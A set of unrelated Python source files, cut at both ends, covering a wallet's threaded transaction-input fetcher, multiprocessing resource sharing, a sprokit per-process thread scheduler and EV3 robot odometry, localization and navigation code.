inps.append(inp) # append either cached result or as-yet-incomplete copy of _inputs[i]
# Now, download the tx's we didn't find above if network is available
# and caller said it's ok to go out ot network.. otherwise just return
# what we have
if use_network and eph.get('_fetch') == t and wallet.network and need_dl_txids:
try: # the whole point of this try block is the `finally` way below...
prog(-1) # tell interested code that progress is now 0%
# Next, queue the transaction.get requests, spreading them
# out randomly over the connected interfaces
q = queue.Queue()
q_ct = 0
bad_txids = set()
def put_in_queue_and_cache(r):
''' we cache the results directly in the network callback
as even if the user cancels the operation, we would like
to save the returned tx in our cache, since we did the
work to retrieve it anyway. '''
q.put(r) # put the result in the queue no matter what it is
txid = ''
try:
# Below will raise if response was 'error' or
# otherwise invalid. Note: for performance reasons
# we don't validate the tx here or deserialize it as
# this function runs in the network thread and we
# don't want to eat up that thread's CPU time
# needlessly. Also note the cache doesn't store
# deserializd tx's so as to save memory. We
# always deserialize a copy when reading the cache.
tx = Transaction(r['result'])
txid = r['params'][0]
assert txid == cls._txid(tx.raw), "txid-is-sane-check" # protection against phony responses
cls.tx_cache_put(tx=tx, txid=txid) # save tx to cache here
except Exception as e:
# response was not valid, ignore (don't cache)
if txid: # txid may be '' if KeyError from r['result'] above
bad_txids.add(txid)
print_error("fetch_input_data: put_in_queue_and_cache fail for txid:", txid, repr(e))
for txid, l in need_dl_txids.items():
wallet.network.queue_request('blockchain.transaction.get', [txid],
interface='random',
callback=put_in_queue_and_cache)
q_ct += 1
class ErrorResp(Exception):
pass
for i in range(q_ct):
# now, read the q back, with a 10 second timeout, and
# populate the inputs
try:
r = q.get(timeout=10)
if eph.get('_fetch') != t:
# early abort from func, canceled
break
if r.get('error'):
msg = r.get('error')
if isinstance(msg, dict):
msg = msg.get('message') or 'unknown error'
raise ErrorResp(msg)
rawhex = r['result']
txid = r['params'][0]
assert txid not in bad_txids, "txid marked bad" # skip if was marked bad by our callback code
tx = Transaction(rawhex); tx.deserialize()
for item in need_dl_txids[txid]:
ii, n = item
assert n < len(tx.outputs())
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inps[ii]['value'] = value
inps[ii]['address'] = addr
print_error("fetch_input_data: fetched from network", ii, addr, value)
prog(i, q_ct) # tell interested code of progress
except queue.Empty:
print_error("fetch_input_data: timed out after 10.0s fetching from network, giving up.")
break
except Exception as e:
print_error("fetch_input_data:", repr(e))
finally:
# force-cancel any extant requests -- this is especially
# crucial on error/timeout/failure.
wallet.network.cancel_requests(put_in_queue_and_cache)
if len(inps) == len(self._inputs) and eph.get('_fetch') == t: # sanity check
eph.pop('_fetch', None) # potential race condition here, popping wrong t -- but in practice w/ CPython threading it won't matter
print_error("fetch_input_data: elapsed {} sec".format(time.time()-t0))
if done_callback:
done_callback(*done_args)
# /doIt
t = threading.Thread(target=doIt, daemon=True)
eph['_fetch'] = t
t.start()
return True
def fetched_inputs(self, *, require_complete=False):
''' Returns the complete list of asynchronously fetched inputs for
this tx, if they exist. If the list is not yet fully retrieved, and
require_complete == False, returns what it has so far
(the returned list will always be exactly equal to len(self._inputs),
with not-yet downloaded inputs coming from self._inputs and not
necessarily containing a good 'address' or 'value').
If the download failed completely or was never started, will return the
empty list [].
Note that some inputs may still lack key: 'value' if there was a network
error in retrieving them or if the download is still in progress.'''
if self._inputs:
ret = self.ephemeral.get('fetched_inputs') or []
diff = len(self._inputs) - len(ret)
if diff > 0 and self.ephemeral.get('_fetch') and not require_complete:
# in progress.. so return what we have so far
return ret + self._inputs[len(ret):]
elif diff == 0 and (not require_complete or not self.ephemeral.get('_fetch')):
# finished *or* in-progress and require_complete==False
return ret
return []
def fetch_cancel(self) -> bool:
''' Cancels the currently-active running fetch operation, if any '''
return bool(self.ephemeral.pop('_fetch', None))
@classmethod
def tx_cache_get(cls, txid : str) -> object:
''' Attempts to retrieve txid from the tx cache that this class
keeps in-memory. Returns None on failure. The returned tx is
not deserialized, and is a copy of the one in the cache. '''
tx = cls._fetched_tx_cache.get(txid)
if tx is not None and tx.raw:
# make sure to return a copy of the transaction from the cache
# so that if caller does .deserialize(), *his* instance will
# use up 10x memory consumption, and not the cached instance which
# should just be an undeserialized raw tx.
return Transaction(tx.raw)
return None
@classmethod
def tx_cache_put(cls, tx : object, txid : str = None):
''' Puts a non-deserialized copy of tx into the tx_cache. '''
if not tx or not tx.raw:
raise ValueError('Please pass a tx which has a valid .raw attribute!')
txid = txid or cls._txid(tx.raw) # optionally, caller can pass-in txid to save CPU time for hashing
cls._fetched_tx_cache.put(txid, Transaction(tx.raw))
def tx_from_str(txt):
"json or raw hexadecimal"
import json
txt = txt.strip()
if not txt:
raise ValueError("empty string")
try:
bfh(txt)
is_hex = True
except:
is_hex = False
if is_hex:
return txt
tx_dict = json.loads(str(txt))
assert "hex" in tx_dict.keys()
return tx_dict["hex"]
|
common.py
|
import inspect
import threading
import netifaces as ni
from netifaces import AF_INET
__author__ = "Piotr Gawlowicz, Anatolij Zubow"
__copyright__ = "Copyright (c) 2015, Technische Universitat Berlin"
__version__ = "0.1.0"
__email__ = "{gawlowicz|zubow}@tkn.tu-berlin.de"
def override():
'''
with this decorator you make sure you are
overriding a method form base class
'''
def overrider(method):
# myClass = method.__self__.__class__
# interface_class = myClass.__mro__[1]
# assert(method.__name__ in dir(interface_class))
return method
return overrider
def is_func_implemented(func):
code = inspect.getsourcelines(func)
lines = code[0]
lastLine = lines[-1]
if "NotImplementedError" in lastLine:
return False
else:
return True
def get_inheritors(klass):
subclasses = {}
work = [klass]
while work:
parent = work.pop()
for child in parent.__subclasses__():
if child not in subclasses:
subclasses[str(child.__name__)] = child
work.append(child)
return subclasses
def get_inheritors_set(klass):
subclasses = set()
work = [klass]
while work:
parent = work.pop()
for child in parent.__subclasses__():
if child not in subclasses:
subclasses.add(child)
work.append(child)
return subclasses
def get_ip_address(ifname):
try:
# AZU: old code was for Linux only; does not work with OSX
# new solution is platform independent
val = ni.ifaddresses(ifname)[AF_INET][0]['addr']
return val
except Exception as e:
print("Failed to get IP address of iface: {} {}".format(ifname, e))
raise e
class UniFlexThread():
"""docstring for UniFlexThread"""
def __init__(self, module):
super().__init__()
self.module = module
self.running = False
def start(self):
self.running = True
self.thread = threading.Thread(target=self.task)
self.thread.setDaemon(True)
self.thread.start()
def task(self):
return
def stop(self):
self.running = False
def is_running(self):
return self.running
def is_stopped(self):
return not self.running
|
resource_sharer.py
|
#
# We use a background thread for sharing fds on Unix, and for sharing sockets on
# Windows.
#
# A client which wants to pickle a resource registers it with the resource
# sharer and gets an identifier in return. The unpickling process will connect
# to the resource sharer, sends the identifier and its pid, and then receives
# the resource.
#
import os
import signal
import socket
import sys
import threading
from . import process
from .context import reduction
from . import util
__all__ = ['stop']
if sys.platform == 'win32':
__all__ += ['DupSocket']
class DupSocket(object):
'''Picklable wrapper for a socket.'''
def __init__(self, sock):
new_sock = sock.dup()
def send(conn, pid):
share = new_sock.share(pid)
conn.send_bytes(share)
self._id = _resource_sharer.register(send, new_sock.close)
def detach(self):
'''Get the socket. This should only be called once.'''
with _resource_sharer.get_connection(self._id) as conn:
share = conn.recv_bytes()
return socket.fromshare(share)
else:
__all__ += ['DupFd']
class DupFd(object):
'''Wrapper for fd which can be used at any time.'''
def __init__(self, fd):
new_fd = os.dup(fd)
def send(conn, pid):
reduction.send_handle(conn, new_fd, pid)
def close():
os.close(new_fd)
self._id = _resource_sharer.register(send, close)
def detach(self):
'''Get the fd. This should only be called once.'''
with _resource_sharer.get_connection(self._id) as conn:
return reduction.recv_handle(conn)
class _ResourceSharer(object):
'''Manager for resouces using background thread.'''
def __init__(self):
self._key = 0
self._cache = {}
self._old_locks = []
self._lock = threading.Lock()
self._listener = None
self._address = None
self._thread = None
util.register_after_fork(self, _ResourceSharer._afterfork)
def register(self, send, close):
'''Register resource, returning an identifier.'''
with self._lock:
if self._address is None:
self._start()
self._key += 1
self._cache[self._key] = (send, close)
return (self._address, self._key)
@staticmethod
def get_connection(ident):
'''Return connection from which to receive identified resource.'''
from .connection import Client
address, key = ident
c = Client(address, authkey=process.current_process().authkey)
c.send((key, os.getpid()))
return c
def stop(self, timeout=None):
'''Stop the background thread and clear registered resources.'''
from .connection import Client
with self._lock:
if self._address is not None:
c = Client(self._address,
authkey=process.current_process().authkey)
c.send(None)
c.close()
self._thread.join(timeout)
if self._thread.is_alive():
util.sub_warning('_ResourceSharer thread did '
'not stop when asked')
self._listener.close()
self._thread = None
self._address = None
self._listener = None
for key, (send, close) in self._cache.items():
close()
self._cache.clear()
def _afterfork(self):
for key, (send, close) in self._cache.items():
close()
self._cache.clear()
# If self._lock was locked at the time of the fork, it may be broken
# -- see issue 6721. Replace it without letting it be gc'ed.
self._old_locks.append(self._lock)
self._lock = threading.Lock()
if self._listener is not None:
self._listener.close()
self._listener = None
self._address = None
self._thread = None
def _start(self):
from .connection import Listener
assert self._listener is None
util.debug('starting listener and thread for sending handles')
self._listener = Listener(authkey=process.current_process().authkey)
self._address = self._listener.address
t = threading.Thread(target=self._serve)
t.daemon = True
t.start()
self._thread = t
def _serve(self):
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, range(1, signal.NSIG))
while 1:
try:
with self._listener.accept() as conn:
msg = conn.recv()
if msg is None:
break
key, destination_pid = msg
send, close = self._cache.pop(key)
try:
send(conn, destination_pid)
finally:
close()
except:
if not util.is_exiting():
sys.excepthook(*sys.exc_info())
_resource_sharer = _ResourceSharer()
stop = _resource_sharer.stop
|
pythread_per_process_scheduler.py
|
#ckwg +28
# Copyright 2012 by Kitware, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither name of Kitware, Inc. nor the names of any contributors may be used
# to endorse or promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from sprokit.pipeline import config
from sprokit.pipeline import datum
from sprokit.pipeline import edge
from sprokit.pipeline import pipeline
from sprokit.pipeline import process
from sprokit.pipeline import scheduler
from sprokit.pipeline import utils
import threading
class UnsupportedProcess(Exception):
def __init__(self, name):
self.name = name
def __str__(self):
fmt = "The process '%s' does not support running in a Python thread"
return (fmt % self.name)
class PyThreadPerProcessScheduler(scheduler.PythonScheduler):
""" Runs each process in a pipeline in its own thread.
"""
def __init__(self, pipe, conf):
scheduler.PythonScheduler.__init__(self, pipe, conf)
p = self.pipeline()
names = p.process_names()
no_threads = process.PythonProcess.property_no_threads
for name in names:
proc = p.process_by_name(name)
properties = proc.properties()
if no_threads in properties:
raise UnsupportedProcess(name)
self._threads = []
self._pause_event = threading.Event()
self._event = threading.Event()
self._make_monitor_edge_config()
def _start(self):
p = self.pipeline()
names = p.process_names()
for name in names:
proc = p.process_by_name(name)
thread = threading.Thread(target=self._run_process, name=name, args=(proc,))
self._threads.append(thread)
for thread in self._threads:
thread.start()
def _wait(self):
for thread in self._threads:
thread.join()
def _pause(self):
self._pause_event.set()
def _resume(self):
self._pause_event.clear()
def _stop(self):
self._event.set()
def _run_process(self, proc):
utils.name_thread(proc.name())
monitor = edge.Edge(self._edge_conf)
proc.connect_output_port(process.PythonProcess.port_heartbeat, monitor)
complete = False
while not complete and not self._event.is_set():
while self._pause_event.is_set():
self._pause_event.wait()
proc.step()
while monitor.has_data():
edat = monitor.get_datum()
dat = edat.datum
if dat.type() == datum.DatumType.complete:
complete = True
def _make_monitor_edge_config(self):
self._edge_conf = config.empty_config()
|
robot.py
|
#!/usr/bin/env python3
from ev3dev2.motor import Motor, SpeedRPS, MoveTank
from ev3dev2.sensor.lego import ColorSensor, UltrasonicSensor
from ev3dev2.power import PowerSupply
from math import pi, sin, cos, atan, atan2, tan, sqrt
from threading import Thread
import numpy as np
from time import sleep, time
from ev3dev2.sensor import INPUT_1, INPUT_4
from ev3dev2.stopwatch import StopWatch
from ev3dev2.sound import Sound
sound = Sound()
class sensores_y_bateria:
def __init__(self, sonar, sensor_color):
self.sonar = UltrasonicSensor(sonar)
self.s_color = ColorSensor(sensor_color)
self.bateria = PowerSupply()
#Sensor ultrasónico
@property
def distancia_sonar(self):
return (self.sonar.distance_centimeters / 100)
@property
def otros_sensores_presentes(self):
return self.sonar.other_sensor_present
#Sensor color
def calibrar_blanco(self):
self.s_color.calibrate_white()
@property
def color(self):
return self.s_color.color
@property
def nombre_color(self):
return self.s_color.color_name
@property
def ambiente(self):
return self.s_color.ambient_light_intensity
@property
def reflexion(self):
return self.s_color.reflected_light_intensity
@property
def rgb(self):
return self.s_color.rgb
#Batería
@property
def voltaje_bateria(self):
return self.bateria.measured_volts
@property
def corriente_bateria(self):
return self.bateria.measured_amps
class motores:
def __init__(self, motor_izquierdo, motor_derecho, radio_rueda, separacion_ruedas):
self.motor_izquierdo = Motor(motor_izquierdo)
self.motor_derecho = Motor(motor_derecho)
self.dos_motores = MoveTank(motor_izquierdo, motor_derecho)
self.radio = radio_rueda
self.sruedas = separacion_ruedas
def SpeedRadPS(self, value):
return SpeedRPS(value/(2*pi))
#Motores separados
@property
def w_motor_derecho(self):
return 2*pi*(self.motor_derecho.speed/self.motor_derecho.count_per_rot)
@w_motor_derecho.setter
def w_motor_derecho(self, velocidad):
self.motor_derecho.on(self.SpeedRadPS(velocidad))
@property
def w_motor_izquierdo(self):
return 2*pi*(self.motor_izquierdo.speed/self.motor_izquierdo.count_per_rot)
@w_motor_izquierdo.setter
def w_motor_izquierdo(self, velocidad):
self.motor_izquierdo.on(self.SpeedRadPS(velocidad))
@property
def dc_motor_izquierdo(self):
return self.motor_izquierdo.duty_cycle
@dc_motor_izquierdo.setter
def dc_motor_izquierdo(self, ciclo):
self.motor_izquierdo.run_direct(duty_cycle_sp = ciclo)
@property
def dc_motor_derecho(self):
return self.motor_derecho.duty_cycle
@dc_motor_derecho.setter
def dc_motor_derecho(self, ciclo):
self.motor_derecho.run_direct(duty_cycle_sp = ciclo)
@property
def posicion_motor_derecho(self):
return self.motor_derecho.position * pi / 180
@property
def posicion_motor_izquierdo(self):
return self.motor_izquierdo.position * pi / 180
#Ambos motores
def correr(self, linear, angular):
derecha = (linear + ((angular * self.sruedas) / 2)) / self.radio
izquierda = (linear - ((angular * self.sruedas) / 2)) / self.radio
self.dos_motores.on(self.SpeedRadPS(izquierda), self.SpeedRadPS(derecha))
def correr_tiempo(self, linear, angular, tiempo, bloqueo):
derecha = ((linear) + ((angular*self.sruedas) / 2)) / self.radio
izquierda = ((linear) - ((angular * self.sruedas) / 2)) / self.radio
self.dos_motores.on_for_seconds(self.SpeedRadPS(izquierda), self.SpeedRadPS(derecha), tiempo, block = bloqueo)
def parar(self):
self.dos_motores.off()
@property
def velocidad_linear(self):
return ((self.w_motor_derecho+self.w_motor_izquierdo)/2)*self.radio
@property
def velocidad_angular(self):
return ((self.w_motor_derecho-self.w_motor_izquierdo)*self.radio)/self.sruedas
class localizacion(motores):
def __init__(self, motor_izquierdo, motor_derecho, radio_rueda, separacion_ruedas, posicion, loc_sonar, loc_sensor_color):
motores.__init__(self, motor_izquierdo, motor_derecho, radio_rueda, separacion_ruedas)
self.s = sensores_y_bateria(sonar = loc_sonar, sensor_color = loc_sensor_color)
self.posicion_robot = posicion
#Odometria
self.izquierda_anterior = self.posicion_motor_izquierdo
self.derecha_anterior = self.posicion_motor_derecho
self.tiempo_anterior = time()
#Probabilística
self.margen_inicial_x_y = 0.05
self.margen_inicial_angulo = 0.573
self.muk = np.array([[self.posicion_robot[0][0]],
[self.posicion_robot[1][0]],
[self.posicion_robot[3][0]]])
self.sigmak = np.array([[(self.margen_inicial_x_y/4)**2, 0.0, 0.0],
[0.0, (self.margen_inicial_x_y/4)**2, 0.0],
[0.0, 0.0, (self.margen_inicial_angulo/4)**2]])
def cutwithwall(self, xk, yk, pk, xp1, yp1, xp2, yp2):
xc = 0
yc = 0
dyp = yp2-yp1
dxp = xp2-xp1
denxc = dyp-dxp*tan(pk)
if denxc == 0:
thereis=0
return thereis, xc, yc
num = dyp*(xk-xp1)+dxp*(yp1-yk)
xc = xk-num/denxc
denyc = dxp-dyp*(1/tan(pk))
if denyc == 0:
thereis=0
return thereis, xc, yc
yc=yk+num/denyc
u = np.array([xc-xk, yc-yk])
r = np.array([cos(pk), sin(pk)])
if (u[0]*r[0]+u[1]*r[1]) < 0:
thereis=0
return thereis, xc, yc
u = np.array([xp2-xp1, yp2-yp1])
c = np.array([xc-xp1, yc-yp1])
mu = sqrt((u[0]**2)+(u[1]**2))
mc = sqrt((c[0]**2)+(c[1]**2))
if (u[0]*c[0]+u[1]*c[1]) < 0:
thereis=0
return thereis, xc, yc
if mc > mu:
thereis=0
return thereis, xc, yc
thereis=1
return thereis, xc, yc
def planeposesonar(self, Ts2u):
originsonar = Ts2u @ np.array([[0], [0], [0], [1]])
endingsonar = Ts2u @ np.array([[1], [0], [0], [1]])
posesonar = [originsonar[0][0], originsonar[1][0], atan2(endingsonar[1][0]-originsonar[1][0], endingsonar[0][0]-originsonar[0][0])]
return posesonar
def raycasting(self, mapa, poser, Ts2u):
posesonar = self.planeposesonar(Ts2u)
nps = len(mapa)
cuts = []
for f in range(0, nps):
thereis0, xc0, yc0 = self.cutwithwall(posesonar[0], posesonar[1], posesonar[2], mapa[f][0], mapa[f][1], mapa[f][2], mapa[f][3])
if thereis0 == 1:
d0 = sqrt(((xc0-posesonar[0])**2)+((yc0-posesonar[1])**2))
cuts.append([f, xc0, yc0, d0])
if cuts == []:
indwall = -1
xc = 0
yc = 0
dc = 0
drc = 0
return indwall, xc, yc, dc, drc
aux = [row[3] for row in cuts]
minc = min(aux)
iminc = aux.index(minc)
indwall = cuts[iminc][0]
xc = cuts[iminc][1]
yc = cuts[iminc][2]
dc = cuts[iminc][3]
drc = sqrt(((xc-poser[0])**2)+(yc-poser[1])**2)
return indwall, xc, yc, dc, drc
def eq3(self, mapa, muk_pred, Ts2u):
calculationsok = 0
Hk = np.array([[0.0, 0.0, 0.0]])
ok = 0
indwall, xc, yc, mu_zk, drc = self.raycasting(mapa, muk_pred, Ts2u)
if indwall == -1:
return calculationsok, Hk, mu_zk
xp1 = mapa[indwall][0]
yp1 = mapa[indwall][1]
xp2 = mapa[indwall][2]
yp2 = mapa[indwall][3]
posesonar = self.planeposesonar(Ts2u)
senbeta = yp2-yp1
cosbeta = xp2-xp1
sentheta = sin(posesonar[2])
costheta = cos(posesonar[2])
if ((senbeta == 0) and (sentheta == 0)) or ((cosbeta == 0) and (costheta == 0)):
return calculationsok, Hk, mu_zk
if (cosbeta != 0) and (costheta != 0):
if (senbeta/cosbeta == sentheta/costheta):
return calculationsok, Hk, mu_zk
if (cosbeta != 0):
tanbeta = senbeta/cosbeta
den = sentheta-costheta*tanbeta
Hk[0][0] = tanbeta/den
Hk[0][1] = -1/den
Hk[0][2] = -(-(posesonar[1]-yp1)+(posesonar[0]-xp1)*tanbeta)*(costheta+sentheta*tanbeta)/(den**2)
else:
cotbeta = cosbeta/senbeta
den = costheta-sentheta*cotbeta
Hk[0][0] = -1/den
Hk[0][1] = cotbeta/den
Hk[0][2] = -(-(posesonar[0]-xp1)+(posesonar[1]-yp1)*cotbeta)*(-sentheta+costheta*cotbeta)/(den**2)
calculationsok = 1
return calculationsok, Hk, mu_zk
def coordenadas_robot_a_global(self, posicion):
T = np.array([[cos(posicion[2][0]), -sin(posicion[2][0]), 0.0, posicion[0][0]],
[sin(posicion[2][0]), cos(posicion[2][0]), 0.0, posicion[1][0]],
[0.0, 0.0, 1.0, 0.0],
[0.0, 0.0, 0.0, 1.0]])
return T
def odometria(self, modo):
izquierda_actual = self.posicion_motor_izquierdo
derecha_actual = self.posicion_motor_derecho
tiempo_actual = time()
rotacion_izquierda = izquierda_actual - self.izquierda_anterior
rotacion_derecha = derecha_actual - self.derecha_anterior
h = tiempo_actual - self.tiempo_anterior
self.izquierda_anterior = izquierda_actual
self.derecha_anterior = derecha_actual
self.tiempo_anterior = tiempo_actual
distancia_izquierda = rotacion_izquierda * self.radio
distancia_derecha = rotacion_derecha * self.radio
distancia_total = (distancia_izquierda + distancia_derecha) / 2.0
rotacion_total = (distancia_derecha - distancia_izquierda) / self.sruedas
if (modo == "euler"): #Euler
self.posicion_robot[0] += distancia_total * cos(self.posicion_robot[3][0])
self.posicion_robot[1] += distancia_total * sin(self.posicion_robot[3][0])
self.posicion_robot[3] += rotacion_total
return self.posicion_robot
elif (modo == "RK2"): #Runge-Kutta de segundo orden
self.posicion_robot[0] += distancia_total * cos(self.posicion_robot[3][0] + (rotacion_total / 2))
self.posicion_robot[1] += distancia_total * sin(self.posicion_robot[3][0] + (rotacion_total / 2))
self.posicion_robot[3] += rotacion_total
return self.posicion_robot
elif (modo == "RK4"): #Runge-Kutta de cuarto orden
theta05 = self.posicion_robot[3][0] + (rotacion_total / 2)
theta1 = self.posicion_robot[3][0] + rotacion_total
self.posicion_robot[0] += distancia_total * (1/6) * (cos(self.posicion_robot[3][0]) + 4 * cos(theta05) + cos(theta1))
self.posicion_robot[1] += distancia_total * (1/6) * (sin(self.posicion_robot[3][0]) + 4 * sin(theta05) + sin(theta1))
self.posicion_robot[3] += rotacion_total
return self.posicion_robot
elif (modo == "Exacto"): #Exacto
v = distancia_total / h
w = rotacion_total / h
theta1 = self.posicion_robot[3][0] + rotacion_total
if w:
self.posicion_robot[0] += (v / w) * (sin(theta1) - sin(self.posicion_robot[3][0]))
self.posicion_robot[1] -= (v / w) * (cos(theta1) - cos(self.posicion_robot[3][0]))
self.posicion_robot[3] += rotacion_total
else:
self.posicion_robot[0] += (distancia_total * cos(self.posicion_robot[3][0]))
self.posicion_robot[1] += (distancia_total * sin(self.posicion_robot[3][0]))
self.posicion_robot[3] += rotacion_total
return self.posicion_robot
elif (modo == "Prob"): #Uso en localización probabilistica
muk_pred = np.array([[self.muk[0][0] + (distancia_total * cos(self.muk[2][0]))],
[self.muk[1][0] + (distancia_total * sin(self.muk[2][0]))],
[self.muk[2][0] + rotacion_total]])
G = np.array([[1.0, 0.0, -distancia_total * sin(self.muk[2][0])],
[0.0, 1.0, distancia_total * cos(self.muk[2][0])],
[0.0, 0.0, 1.0]])
self.posicion_robot[0] += distancia_total * cos(self.posicion_robot[3][0])
self.posicion_robot[1] += distancia_total * sin(self.posicion_robot[3][0])
self.posicion_robot[3] += rotacion_total
return muk_pred, G
def localizacion_probabilistica(self, mapa, rox, roy, rotheta, Rk):
muk_pred, G = self.odometria("Prob")
Q = np.array([[(rox*(muk_pred[0][0]-self.muk[0][0]))**2, 0.0, 0.0],
[0.0, (roy*(muk_pred[1][0]-self.muk[1][0]))**2, 0.0],
[0.0, 0.0, (rotheta*(muk_pred[2][0]-self.muk[2][0]))**2]])
sigmak_pred = G @ self.sigmak @ G.T + Q
offsx = -0.059
offsy = -0.0235
offsphi = pi/2
rTs = np.array([[cos(offsphi), -sin(offsphi), 0, offsx],
[sin(offsphi), cos(offsphi), 0, offsy],
[0, 0, 1, 0],
[0, 0, 0, 1]])
uTr = self.coordenadas_robot_a_global(muk_pred)
uTs = uTr @ rTs
calculationsok, Hk, mu_zk = self.eq3(mapa, muk_pred, uTs)
distancia = self.s.distancia_sonar
if calculationsok:
sigma_zk = Hk[0] @ sigmak_pred @ Hk.T + Rk
sigmapok_pred = sigmak_pred @ Hk.T
Kk = sigmapok_pred * (1/sigma_zk)
self.muk = muk_pred + Kk * (distancia - mu_zk)
self.sigmak = sigmak_pred - Kk @ (Hk @ sigmak_pred)
else:
self.muk = muk_pred
self.sigmak = sigmak_pred
return self.muk, self.sigmak
class navegacion(localizacion):
def __init__(self, motor_izquierdo, motor_derecho, radio_rueda, separacion_ruedas, posicion, nav_sonar, nav_sensor_color):
localizacion.__init__(self, motor_izquierdo, motor_derecho, radio_rueda, separacion_ruedas, posicion, nav_sonar, nav_sensor_color)
#Fichero
self.f = None
self.escribir_fichero_activo = False
self.fin_escribir_fichero = True
self.t = StopWatch()
def coordenadas_global_a_robot(self, robot, punto_global):
R = np.array([[cos(robot[3][0]), -sin(robot[3][0]), 0.0],
[sin(robot[3][0]), cos(robot[3][0]), 0.0],
[0.0, 0.0, 1.0]])
Rt = R.transpose()
aux = -(Rt @ robot[:3])
T = np.array([[Rt[0][0], Rt[0][1], Rt[0][2], aux[0][0]],
[Rt[1][0], Rt[1][1], Rt[1][2], aux[1][0]],
[Rt[2][0], Rt[2][1], Rt[2][2], aux[2][0]],
[0, 0, 0, 1]])
p = np.array([[punto_global[0][0]], [punto_global[1][0]], [punto_global[2][0]], [1]])
resultado = T @ p
return resultado[:3]
def navegacion_planificada(self, puntos_objetivos, KW):
vector_hasta_destino = np.array([0.0, 0.0, 0.0])
for punto in puntos_objetivos:
while 1:
robot = self.odometria("RK4")
vector_hasta_destino[0] = punto[0] - robot[0][0]
vector_hasta_destino[1] = punto[1] - robot[1][0]
vector_hasta_destino[2] = punto[2] - robot[2][0]
modulo = sqrt(vector_hasta_destino @ vector_hasta_destino.T)
if (modulo <= 0.05):
sound.beep()
break
angulo_objetivo = atan2(vector_hasta_destino[1], vector_hasta_destino[0])
if angulo_objetivo < 0:
angulo_objetivo = angulo_objetivo + 2 * pi
angulo_robot = robot[3][0]
while angulo_robot > 2*pi:
angulo_robot = angulo_robot - 2 * pi
while angulo_robot < 0:
angulo_robot = angulo_robot + 2 * pi
angulo = angulo_objetivo - angulo_robot
if angulo < -pi:
angulo = angulo + 2 * pi
if angulo > pi:
angulo = -(2 * pi - angulo)
w = KW * angulo
if w > pi:
w = pi
if w < -pi:
w = -pi
self.correr(0.2, w)
self.parar()
def navegacion_reactiva_campos_virtuales(self, objetivo, rTs, KA, KR):
vector_resultante = np.array([0.0, 0.0, 0.0])
while 1:
vector_hasta_destino = self.coordenadas_global_a_robot(self.odometria("RK4"), objetivo)
vector_de_repulsion = np.array([[0.0], [0.0], [0.0]])
modulo = sqrt(vector_hasta_destino[0].T @ vector_hasta_destino[0])
if (modulo <= 0.05):
break
obstaculo = rTs @ np.array([[self.s.distancia_sonar], [0.0], [0.0], [1.0]])
modulo = sqrt(obstaculo[:3][0].T @ obstaculo[:3][0])
if modulo > 0.45:
vector_de_repulsion[0][0] = 0.0
vector_de_repulsion[1][0] = 0.0
vector_de_repulsion[2][0] = 0.0
else:
vector_de_repulsion= ((0.45 - modulo) / 0.45) * obstaculo
vector_resultante[0] = KA * vector_hasta_destino[0][0] - KR * vector_de_repulsion[0][0]
vector_resultante[1] = KA * vector_hasta_destino[1][0] - KR * vector_de_repulsion[1][0]
vector_resultante[2] = KA * vector_hasta_destino[2][0] - KR * vector_de_repulsion[2][0]
v = 0.2 * vector_resultante[0]
w = 2 * vector_resultante[1]
if(v > 0.2):
v = 0.2
if(v < -0.2):
v = -0.2
if(w > pi):
w = pi
if(w < -pi):
w = -pi
self.correr(v, w)
self.parar()
#Guardar datos
def empezar_fichero(self, nombre_fichero, tiempo, *args, **kwargs):
def hilo_fichero():
self.t.start()
while self.escribir_fichero_activo:
for l in args:
if l == "tiempo":
self.f.write(str(self.t.value_ms/1000)+" ")
elif l == "distancia_sonar":
self.f.write(str(self.s.distancia_sonar)+" ")
elif l == "otros_sensores_presentes":
self.f.write(str(self.s.otros_sensores_presentes)+" ")
elif l == "color":
self.f.write(str(self.s.color)+" ")
elif l == "nombre_color":
self.f.write(str(self.s.nombre_color)+" ")
elif l == "ambiente":
self.f.write(str(self.s.ambiente)+" ")
elif l == "reflexion":
self.f.write(str(self.s.reflexion)+" ")
elif l == "rgb":
self.f.write(str(self.s.rgb)+" ")
elif l == "voltaje_bateria":
self.f.write(str(self.s.voltaje_bateria)+" ")
elif l == "corriente_bateria":
self.f.write(str(self.s.corriente_bateria)+" ")
elif l == "w_motor_derecho":
self.f.write(str(self.w_motor_derecho)+" ")
elif l == "w_motor_izquierdo":
self.f.write(str(self.w_motor_izquierdo)+" ")
elif l == "dc_motor_izquierdo":
self.f.write(str(self.dc_motor_izquierdo)+" ")
elif l == "dc_motor_derecho":
self.f.write(str(self.dc_motor_derecho)+" ")
elif l == "posicion_motor_derecho":
self.f.write(str(self.posicion_motor_derecho)+" ")
elif l == "velocidad_linear":
self.f.write(str(self.velocidad_linear)+" ")
elif l == "velocidad_angular":
self.f.write(str(self.velocidad_angular)+" ")
elif l == "odometria":
if "modo" in kwargs:
posicion = self.odometria(kwargs["modo"])
self.f.write(str(posicion[0][0])+" "+str(posicion[1][0])+" "+str(posicion[2][0])+" "+str(posicion[3][0])+" ")
elif l == "localizacion_probabilistica":
